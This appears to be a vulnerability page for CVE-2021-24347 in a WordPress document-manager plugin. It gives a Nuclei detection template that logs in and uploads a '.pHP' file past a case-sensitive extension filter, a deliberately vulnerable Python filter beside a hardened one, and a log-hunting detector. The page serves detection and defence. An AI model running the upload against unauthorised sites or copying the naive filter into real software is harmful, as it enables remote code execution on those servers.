WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
ID: CVE-2021-24347
Severity: high
Author: theamanrawat
Tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins
Description
WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded by checking the file extension. Because that check is case-sensitive (CWE-178), PHP files can still be uploaded by changing the case of the file extension, for example from php to pHP.
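As an added illustration (not the plugin's code and not part of the Nuclei template), the following Python models the weakness class: a case-sensitive denylist comparison on the submitted extension beside a check that normalises case first and applies an allowlist. The set contents and function names are this example's own assumptions; the lowercased stored name mirrors the template's final to_lower(...) request. The hardened check goes beyond the page in also refusing a blocked extension anywhere in the name (a.php.pdf), which matters for servers that map handlers on any extension in a filename.

```python
"""Case-sensitive extension denylist versus a normalised allowlist.

Constructed illustration of the weakness class behind CVE-2021-24347
(CWE-178); the set contents and function names are this example's own,
not the plugin's code.
"""
import os

# Denylist a naive upload filter might carry (constructed for the example).
BLOCKED_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}

# Allowlist for a document-manager upload form (constructed for the example).
ALLOWED_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "png", "jpg", "jpeg", "txt"}


def extension_of(filename: str) -> str:
    """Text after the final dot, or '' when there is none."""
    return os.path.splitext(filename)[1][1:]


def naive_is_upload_allowed(filename: str) -> bool:
    """Vulnerable pattern: compare the extension exactly as submitted.

    'php' is refused, but 'pHP' is a different string and slips through.
    """
    return extension_of(filename) not in BLOCKED_EXTENSIONS


def stored_name(filename: str) -> str:
    """Name under which the file ends up on disk.

    The template's final request fetches to_lower(...) of the uploaded name,
    so storage lowercases it: the check saw 'x.pHP', the web server serves 'x.php'.
    """
    return os.path.basename(filename).lower()


def hardened_is_upload_allowed(filename: str) -> bool:
    """Decide on the normalised (stored) name and require an allowlisted extension.

    Every dot-separated segment is also checked against the denylist so that
    'a.php.pdf' is refused as well.
    """
    name = stored_name(filename)
    if not name or name.startswith("."):
        return False
    segments = name.split(".")[1:]  # everything after the base name
    if not segments:
        return False
    if any(seg in BLOCKED_EXTENSIONS for seg in segments):
        return False
    return segments[-1] in ALLOWED_EXTENSIONS
```

The point of `stored_name` is that the decision and the on-disk name must be computed from the same normalised string; a filter that inspects the raw submission while storage rewrites it is checking something other than what will be served.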
YAML Source
id: CVE-2021-24347

info:
  name: WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload
  author: theamanrawat
  severity: high
  description: |
    WordPress SP Project & Document Manager plugin before 4.22 is susceptible to authenticated shell upload. The plugin allows users to upload files; however, the plugin attempts to prevent PHP and other similar executable files from being uploaded via checking the file extension. PHP files can still be uploaded by changing the file extension's case, for example, from php to pHP.
  impact: |
    Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected WordPress site.
  remediation: Fixed in version 4.22.
  reference:
    - https://wpscan.com/vulnerability/8f6e82d5-c0e9-468e-acb8-7cd549f6a45a
    - https://wordpress.org/plugins/sp-client-document-manager/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24347
    - http://packetstormsecurity.com/files/163434/WordPress-SP-Project-And-Document-Manager-4.21-Shell-Upload.html
    - https://github.com/Hacker5preme/Exploits
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-24347
    cwe-id: CWE-178
    epss-score: 0.96895
    epss-percentile: 0.99708
    cpe: cpe:2.3:a:smartypantsplugins:sp_project_\&_document_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: smartypantsplugins
    product: sp_project_\&_document_manager
    framework: wordpress
  tags: cve2021,cve,sp-client-document-manager,wpscan,wp-plugin,wp,authenticated,wordpress,rce,packetstorm,intrusive,smartypantsplugins

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy

        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="cdm_upload_file_field"

        {{nonce}}
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="_wp_http_referer"

        /wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-name"

        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-file[]"; filename=""
        Content-Type: application/octet-stream

        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-file[]"; filename="{{randstr}}.pHP"
        Content-Type: image/svg+xml

        <?php
        echo "CVE-2021-24347";
        ?>
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="dlg-upload-notes"

        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy
        Content-Disposition: form-data; name="sp-cdm-community-upload"

        Upload
        ------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--
      - |
        GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower("{{randstr}}.pHP")}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - contains(header_4, "text/html")
          - status_code_4 == 200
          - contains(body_4, "CVE-2021-24347")
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="cdm_upload_file_field" value="([0-9a-zA-Z]+)"
        internal: true
# digest: 490a004630440220133f7d350872d199ae44e622ea7866b4fb6184d039991a5bb01fadfb953cd46e02206683440b703273f881aa94aed5c345d1f663f60a7e62c00e46cc9c0f61a54519:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used with the Nuclei tool to detect the vulnerability. It logs in with the supplied username and password, extracts the upload nonce from the plugin's file view page, uploads a small PHP file with a mixed-case extension, and then requests the stored (lowercased) file to confirm that the marker string is served back as text/html. The template is tagged intrusive because it writes a file into the target's upload directory, so run it only against systems you are authorised to test. The -u flag takes the target URL and -t the template path:
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24347.yaml"
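The template's final request, fetching a PHP file from the plugin's upload directory, is also the artefact a defender can hunt for after the fact. The following Python is an added example (not part of the Nuclei template): it scans web-server access logs in the common combined format for PHP-family files requested under the plugin's upload path and for POSTs to the file view page. The log lines are constructed with RFC 5737 addresses; the paths come from the template above, and the rule names are this example's own.

```python
"""Hunt access logs for PHP-family files served from the plugin's upload
directory, the artefact the Nuclei template's final request checks for.

Added example; the log lines are constructed, and the detection logic is this
example's own, not part of the template.
"""
import re

# Apache/nginx "combined" format: client, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+'
)

UPLOAD_DIR = "/wp-content/uploads/sp-client-document-manager/"
FILEVIEW_PAGE = "/wp-admin/admin.php?page=sp-client-document-manager-fileview"
# Match the extension case-insensitively: the stored name is lowercased, but a
# request for notes.PhTml is just as interesting as one for notes.phtml.
SCRIPT_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)

# Constructed sample lines (RFC 5737 addresses), not real log data.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2021:12:00:01 +0000] "POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jul/2021:12:00:02 +0000] "GET /wp-content/uploads/sp-client-document-manager/1/kq8tz2.php HTTP/1.1" 200 17 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2021:12:00:03 +0000] "GET /wp-content/uploads/sp-client-document-manager/3/quarterly-report.pdf HTTP/1.1" 200 84311 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jul/2021:12:00:04 +0000] "GET /wp-content/uploads/sp-client-document-manager/2/notes.PhTml HTTP/1.1" 404 212 "-" "curl/7.68.0"
"""


def find_suspicious(log_text: str) -> list:
    """Return one finding per line that matches either rule, in log order."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, status = m["path"], int(m["status"])
        bare_path = path.split("?", 1)[0]  # the query string is irrelevant here
        reason = None
        if bare_path.startswith(UPLOAD_DIR) and SCRIPT_EXT_RE.search(bare_path):
            # A 200 means the server handed the file out (or executed it);
            # anything else is still a request worth correlating.
            reason = ("script served from upload dir" if status == 200
                      else "script requested in upload dir")
        elif m["method"] == "POST" and path.startswith(FILEVIEW_PAGE):
            reason = "upload via fileview page"
        if reason:
            findings.append({"ip": m["ip"], "path": path,
                             "status": status, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_LOG):
        print(f"{f['ip']:>14}  {f['status']}  {f['reason']:<32} {f['path']}")
```

Correlating the two rules by client address (an upload POST followed shortly by a script request from the same IP) gives a higher-confidence signal than either rule alone; the upload-directory rule by itself is still worth alerting on, since a document manager has no legitimate reason to serve PHP from that path.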